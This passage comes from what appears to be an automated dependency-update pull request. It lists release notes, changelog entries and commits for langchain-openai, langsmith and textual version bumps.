href=\"https://redirect.github.com/langchain-ai/langchain/issues/38130\"\u003e#38130\u003c/a\u003e)\u003c/p\u003e\n\u003ch2\u003elangchain-openai==1.3.1\u003c/h2\u003e\n\u003cp\u003eChanges since langchain-openai==1.3.0\u003c/p\u003e\n\u003cp\u003edocs: refresh \u003ccode\u003eREADME\u003c/code\u003e installation and resources (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38119\"\u003e#38119\u003c/a\u003e)\ntest(core,langchain): update tests for explicit deserialization allowlists (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38118\"\u003e#38118\u003c/a\u003e)\nrelease(core): 1.4.7 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38111\"\u003e#38111\u003c/a\u003e)\nfix(core,partners): rename package version trace metadata (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38110\"\u003e#38110\u003c/a\u003e)\nstyle(core,langchain,langchain-classic,partners): replace double backticks in docstrings (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38095\"\u003e#38095\u003c/a\u003e)\ntest(openai): use \u003ccode\u003egpt-4o\u003c/code\u003e for image token counting (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38089\"\u003e#38089\u003c/a\u003e)\nrelease(core): 1.4.6 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38061\"\u003e#38061\u003c/a\u003e)\nfeat(core,partners): add package version tracking to tracing metadata (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/35295\"\u003e#35295\u003c/a\u003e)\nfix(core,openai): normalize v1 streamed tool calls (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/35983\"\u003e#35983\u003c/a\u003e)\nchore(infra): bump mypy to 2.1 and unify type-check config across the monorepo (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/36470\"\u003e#36470\u003c/a\u003e)\nfeat(standard-tests): validate tool call chunks during streaming (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/34707\"\u003e#34707\u003c/a\u003e)\nfix(langchain): tighten structured output model fallbacks (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38042\"\u003e#38042\u003c/a\u003e)\u003c/p\u003e\n\u003ch2\u003elangchain-openai==1.3.0\u003c/h2\u003e\n\u003cp\u003eChanges since langchain-openai==1.2.2\u003c/p\u003e\n\u003cp\u003ehotfix(openai): min core dep (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37990\"\u003e#37990\u003c/a\u003e)\nrelease(openai): 1.3.0 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37989\"\u003e#37989\u003c/a\u003e)\nfeat(openai): support \u003ccode\u003eapply_patch\u003c/code\u003e built-in tool (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37157\"\u003e#37157\u003c/a\u003e)\nchore(model-profiles): refresh model profile data (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37973\"\u003e#37973\u003c/a\u003e)\ntest(langchain,partners): disable pytest-benchmark under xdist to silence \u003ccode\u003ePytestBenchmarkWarning\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37901\"\u003e#37901\u003c/a\u003e)\nchore(model-profiles): refresh model profile data (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37895\"\u003e#37895\u003c/a\u003e)\u003c/p\u003e\n\u003ch2\u003elangchain-openai==1.2.2\u003c/h2\u003e\n\u003cp\u003eChanges since langchain-openai==1.2.1\u003c/p\u003e\n\u003cp\u003erelease(openai): 1.2.2 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37617\"\u003e#37617\u003c/a\u003e)\nchore(infra): bump \u003ccode\u003elangchain-tests\u003c/code\u003e floor to 1.1.9 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37610\"\u003e#37610\u003c/a\u003e)\ntest(openai): unbreak audio chat and Azure embedding integration tests (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37589\"\u003e#37589\u003c/a\u003e)\nfix(openai): guard httpx finalizers (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37570\"\u003e#37570\u003c/a\u003e)\nchore: bump langsmith from 0.8.4 to 0.8.5 in /libs/partners/openai (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37549\"\u003e#37549\u003c/a\u003e)\nchore: bump idna from 3.11 to 3.15 in /libs/partners/openai (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37548\"\u003e#37548\u003c/a\u003e)\nci(infra): harden Dependabot version-bound preservation (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37510\"\u003e#37510\u003c/a\u003e)\ntest(standard-tests): assert \u003ccode\u003els_model_name\u003c/code\u003e honors per-call model override (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37504\"\u003e#37504\u003c/a\u003e)\nfix(openai): source LLM context size from model profiles (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37489\"\u003e#37489\u003c/a\u003e)\nchore(core,langchain,openai): refresh stale OpenAI model references (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37487\"\u003e#37487\u003c/a\u003e)\nfix(openai): broaden condition for ContextOverflowError to accommodate other providers (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37457\"\u003e#37457\u003c/a\u003e)\ndocs(openai): document \u003ccode\u003ebase_url\u003c/code\u003e env var fallback chain (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37436\"\u003e#37436\u003c/a\u003e)\nchore: bump langsmith from 0.8.0 to 0.8.4 in /libs/partners/openai (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37416\"\u003e#37416\u003c/a\u003e)\nchore: bump langsmith from 0.7.31 to 0.8.0 in /libs/partners/openai (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37398\"\u003e#37398\u003c/a\u003e)\nchore(infra): merge v1.4 into master (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37350\"\u003e#37350\u003c/a\u003e)\nchore: bump urllib3 from 2.6.3 to 2.7.0 in /libs/partners/openai (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37330\"\u003e#37330\u003c/a\u003e)\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/879cad06769913c8329d72e700263537ff436053\"\u003e\u003ccode\u003e879cad0\u003c/code\u003e\u003c/a\u003e release(openai): 1.3.2 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38130\"\u003e#38130\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/37b339f8c468f4c6ba82514629e631c189c4fc50\"\u003e\u003ccode\u003e37b339f\u003c/code\u003e\u003c/a\u003e fix(openai): build Codex async headers off the event loop in \u003ccode\u003e_agenerate\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/3\"\u003e#3\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/11429a9e1c37efccd1da92246d6f5b878a2af74a\"\u003e\u003ccode\u003e11429a9\u003c/code\u003e\u003c/a\u003e fix(openai): avoid sync token reads in Codex streaming (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38128\"\u003e#38128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/454e19588c027b97ea54f5d079a19798b229b84f\"\u003e\u003ccode\u003e454e195\u003c/code\u003e\u003c/a\u003e hotfix(openai): skip Codex live integration tests in CI (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38124\"\u003e#38124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/9e6f58ba4650904f161bea80337566cf3751fccc\"\u003e\u003ccode\u003e9e6f58b\u003c/code\u003e\u003c/a\u003e hotfix(openai): switch version (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38123\"\u003e#38123\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/bf7b0180f2e5ccc71b15143e14622ba4e132c421\"\u003e\u003ccode\u003ebf7b018\u003c/code\u003e\u003c/a\u003e refactor(openai): mark Codex OAuth classes private (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38122\"\u003e#38122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/34af8839c341bcd12e246634c1b6d75532fb1ee8\"\u003e\u003ccode\u003e34af883\u003c/code\u003e\u003c/a\u003e chore(infra): wire up per-partner version-consistency pre-commit hooks (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38121\"\u003e#38121\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/8180a09dd7712e231f501c1795985b7bacba8735\"\u003e\u003ccode\u003e8180a09\u003c/code\u003e\u003c/a\u003e release(openai): 1.4.0 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38120\"\u003e#38120\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/6c2b70e60e51de9987b2a96529f18c5ff8559a0d\"\u003e\u003ccode\u003e6c2b70e\u003c/code\u003e\u003c/a\u003e feat(openai): add ChatGPT OAuth-backed \u003ccode\u003eChatOpenAICodex\u003c/code\u003e chat model (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37569\"\u003e#37569\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/63cc1f4e7d3dbaaa284d25ddac89cafe35bd8874\"\u003e\u003ccode\u003e63cc1f4\u003c/code\u003e\u003c/a\u003e docs: refresh \u003ccode\u003eREADME\u003c/code\u003e installation and resources (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38119\"\u003e#38119\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/langchain-ai/langchain/compare/langchain-openai==1.2.1...langchain-openai==1.3.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `langsmith` from 0.8.5 to 0.8.15\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/releases\"\u003elangsmith's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.8.15\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003echore(js): exclude generated _openapi_client from linters and type-checker by \u003ca href=\"https://github.com/KiewanVillatel\"\u003e\u003ccode\u003e@​KiewanVillatel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3015\"\u003elangchain-ai/langsmith-sdk#3015\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: sync langsmith_api by \u003ca href=\"https://github.com/langtions-bot\"\u003e\u003ccode\u003e@​langtions-bot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3006\"\u003elangchain-ai/langsmith-sdk#3006\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: protect JS openapi client in workflow by \u003ca href=\"https://github.com/KiewanVillatel\"\u003e\u003ccode\u003e@​KiewanVillatel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3017\"\u003elangchain-ai/langsmith-sdk#3017\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(js): deliver sandbox output callbacks across stream reconnects by \u003ca href=\"https://github.com/langchain-infra\"\u003e\u003ccode\u003e@​langchain-infra\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3022\"\u003elangchain-ai/langsmith-sdk#3022\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(python): deliver sandbox output callbacks across stream reconnects by \u003ca href=\"https://github.com/langchain-infra\"\u003e\u003ccode\u003e@​langchain-infra\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3023\"\u003elangchain-ai/langsmith-sdk#3023\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: bump JS to 0.7.7 and Python to 0.8.15 by \u003ca href=\"https://github.com/langchain-infra\"\u003e\u003ccode\u003e@​langchain-infra\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3025\"\u003elangchain-ai/langsmith-sdk#3025\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/compare/v0.8.14...v0.8.15\"\u003ehttps://github.com/langchain-ai/langsmith-sdk/compare/v0.8.14...v0.8.15\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.8.14\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efeat: add deepagent compatibility smoke tests to Python and JS CI [LSDK-214] by \u003ca href=\"https://github.com/QuentinBrosse\"\u003e\u003ccode\u003e@​QuentinBrosse\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2997\"\u003elangchain-ai/langsmith-sdk#2997\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(py): bump Python SDK to 0.8.14 by \u003ca href=\"https://github.com/vishnu-ssuresh\"\u003e\u003ccode\u003e@​vishnu-ssuresh\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3013\"\u003elangchain-ai/langsmith-sdk#3013\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/compare/v0.8.13...v0.8.14\"\u003ehttps://github.com/langchain-ai/langsmith-sdk/compare/v0.8.13...v0.8.14\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.8.13\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(py): type sandbox startup errors by \u003ca href=\"https://github.com/vishnu-ssuresh\"\u003e\u003ccode\u003e@​vishnu-ssuresh\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3004\"\u003elangchain-ai/langsmith-sdk#3004\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(py): bump Python SDK to 0.8.13 by \u003ca href=\"https://github.com/vishnu-ssuresh\"\u003e\u003ccode\u003e@​vishnu-ssuresh\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3012\"\u003elangchain-ai/langsmith-sdk#3012\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/compare/v0.8.12...v0.8.13\"\u003ehttps://github.com/langchain-ai/langsmith-sdk/compare/v0.8.12...v0.8.13\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.8.12\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eci: protect _openapi_client from unauthorized changes by \u003ca href=\"https://github.com/KiewanVillatel\"\u003e\u003ccode\u003e@​KiewanVillatel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2999\"\u003elangchain-ai/langsmith-sdk#2999\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: gemini double counting of over 200k tokens by \u003ca href=\"https://github.com/dqbd\"\u003e\u003ccode\u003e@​dqbd\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3003\"\u003elangchain-ai/langsmith-sdk#3003\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(python): cross-process OAuth refresh filesystem lock by \u003ca href=\"https://github.com/langchain-infra\"\u003e\u003ccode\u003e@​langchain-infra\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2988\"\u003elangchain-ai/langsmith-sdk#2988\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(js): cross-process OAuth refresh filesystem lock by \u003ca href=\"https://github.com/langchain-infra\"\u003e\u003ccode\u003e@​langchain-infra\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2989\"\u003elangchain-ai/langsmith-sdk#2989\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: avoid duplicate /v1 in hub URLs when endpoint includes /api/v1 by \u003ca href=\"https://github.com/langchain-infra\"\u003e\u003ccode\u003e@​langchain-infra\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3008\"\u003elangchain-ai/langsmith-sdk#3008\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: bump JS to 0.7.6 and Python to 0.8.12 by \u003ca href=\"https://github.com/langchain-infra\"\u003e\u003ccode\u003e@​langchain-infra\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3011\"\u003elangchain-ai/langsmith-sdk#3011\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/compare/v0.8.11...v0.8.12\"\u003ehttps://github.com/langchain-ai/langsmith-sdk/compare/v0.8.11...v0.8.12\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.8.11\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: match async feedback client to sync behavior [LSEN-206] by \u003ca href=\"https://github.com/vishnu-ssuresh\"\u003e\u003ccode\u003e@​vishnu-ssuresh\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3001\"\u003elangchain-ai/langsmith-sdk#3001\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/compare/v0.8.10...v0.8.11\"\u003ehttps://github.com/langchain-ai/langsmith-sdk/compare/v0.8.10...v0.8.11\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.8.10\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efeat(sandbox): size the dockerfile-build sandbox via vCpus/memBytes (js) by \u003ca href=\"https://github.com/langchain-infra\"\u003e\u003ccode\u003e@​langchain-infra\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2980\"\u003elangchain-ai/langsmith-sdk#2980\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/commit/84b7144242e5cc53ce55752cc5be6369ffc1bd9f\"\u003e\u003ccode\u003e84b7144\u003c/code\u003e\u003c/a\u003e chore: bump JS to 0.7.7 and Python to 0.8.15 (\u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/issues/3025\"\u003e#3025\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/commit/909390fb9ac66d15e3630ad6e2bf01ac5c9e1774\"\u003e\u003ccode\u003e909390f\u003c/code\u003e\u003c/a\u003e fix(python): deliver sandbox output callbacks across stream reconnects (\u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/issues/3023\"\u003e#3023\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/commit/504f641d0ff0d4dfa6b3fb8ed1617d9bb9754f64\"\u003e\u003ccode\u003e504f641\u003c/code\u003e\u003c/a\u003e fix(js): deliver sandbox output callbacks across stream reconnects (\u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/issues/3022\"\u003e#3022\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/commit/f10fe78b0d1efbab7c76d6d99e0fa6ac48fb285d\"\u003e\u003ccode\u003ef10fe78\u003c/code\u003e\u003c/a\u003e chore: protect JS openapi client in workflow (\u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/issues/3017\"\u003e#3017\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/commit/7423a8aa98b3650fc12e64d156cb1ad958444037\"\u003e\u003ccode\u003e7423a8a\u003c/code\u003e\u003c/a\u003e chore: sync langsmith_api (\u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/issues/3006\"\u003e#3006\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/commit/047adc9535e45d06cadf4383c85db058d0790e4a\"\u003e\u003ccode\u003e047adc9\u003c/code\u003e\u003c/a\u003e chore(js): exclude generated _openapi_client from linters and type-checker (#...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/commit/3ac6bb8a5cde1f079265842f6f82273b0ce9e543\"\u003e\u003ccode\u003e3ac6bb8\u003c/code\u003e\u003c/a\u003e chore(py): bump Python SDK to 0.8.14 (\u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/issues/3013\"\u003e#3013\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/commit/36fe84563405928b73cdb2f28b2be8349c897515\"\u003e\u003ccode\u003e36fe845\u003c/code\u003e\u003c/a\u003e feat: add deepagent compatibility smoke tests to Python and JS CI [LSDK-214] ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/commit/572014cd2cbad1c26e6372614a1a972be9b086c7\"\u003e\u003ccode\u003e572014c\u003c/code\u003e\u003c/a\u003e chore(py): bump Python SDK to 0.8.13 (\u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/issues/3012\"\u003e#3012\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/commit/03f3b8c741efcbd595dd39849199b7ffa18b9c03\"\u003e\u003ccode\u003e03f3b8c\u003c/code\u003e\u003c/a\u003e fix(py): type sandbox startup errors (\u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/issues/3004\"\u003e#3004\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/compare/v0.8.5...v0.8.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `textual` from 8.2.6 to 8.2.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Textualize/textual/releases\"\u003etextual's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eThe more Kitty Release\u003c/h2\u003e\n\u003cp\u003eThis release adds additional support for the Kitty key protocol. Which enables some additional keys on some terminals. Additionally, Textual will report modifier keys as separate key events.\u003c/p\u003e\n\u003cp\u003eAdditionally there are a few more shortcuts to the Text Area.\u003c/p\u003e\n\u003cp\u003eThis release sponsored by Mistral AI. See release notes for detail.\u003c/p\u003e\n\u003ch2\u003e[8.2.7] - 2026-05-19\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for Kitty key protocol \u0026quot;Report all keys as escape codes\u0026quot; which enabled alt+backspace on Warp \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6544\"\u003eTextualize/textual#6544\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdded support for detecting separate modifier keys for terminals that support the Kitty key protocol \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6544\"\u003eTextualize/textual#6544\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003eTEXTUAL_DISABLE_KITTY_KEY\u003c/code\u003e env var to disable Kitty key protocol support (debug aid). \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6544\"\u003eTextualize/textual#6544\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUndo/redo/copy/cut/paste in TextArea will now work with cmd+ on supported terminals \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6543\"\u003eTextualize/textual#6543\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIn TextArea, ctrl+u will now delete a newline if the cursor is at the start \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6543\"\u003eTextualize/textual#6543\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ein TextArea alt+delete is now bound to delete word right \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6543\"\u003eTextualize/textual#6543\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eText opacity applied to an ansi theme will now set the dim attribute if the opacity is \u0026lt; 50% \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6546\"\u003eTextualize/textual#6546\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Textualize/textual/blob/main/CHANGELOG.md\"\u003etextual's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[8.2.7] - 2026-05-19\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for Kitty key protocol \u0026quot;Report all keys as escape codes\u0026quot; which enabled alt+backspace on Warp \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6544\"\u003eTextualize/textual#6544\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdded support for detecting separate modifier keys for terminals that support the Kitty key protocol \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6544\"\u003eTextualize/textual#6544\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003eTEXTUAL_DISABLE_KITTY_KEY\u003c/code\u003e env var to disable Kitty key protocol support (debug aid). \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6544\"\u003eTextualize/textual#6544\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUndo/redo/copy/cut/paste in TextArea will now work with cmd+ on supported terminals \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6543\"\u003eTextualize/textual#6543\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIn TextArea, ctrl+u will now delete a newline if the cursor is at the start \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6543\"\u003eTextualize/textual#6543\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ein TextArea alt+delete is now bound to delete word right \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6543\"\u003eTextualize/textual#6543\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eText opacity applied to an ansi theme will now set the dim attribute if the opacity is \u0026lt; 50% \u003ca href=\"https://redirect.github.com/Textualize/textual/pull/6546\"\u003eTextualize/textual#6546\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed text opacity with ANSI themes creating RGB colors.  \u003ca 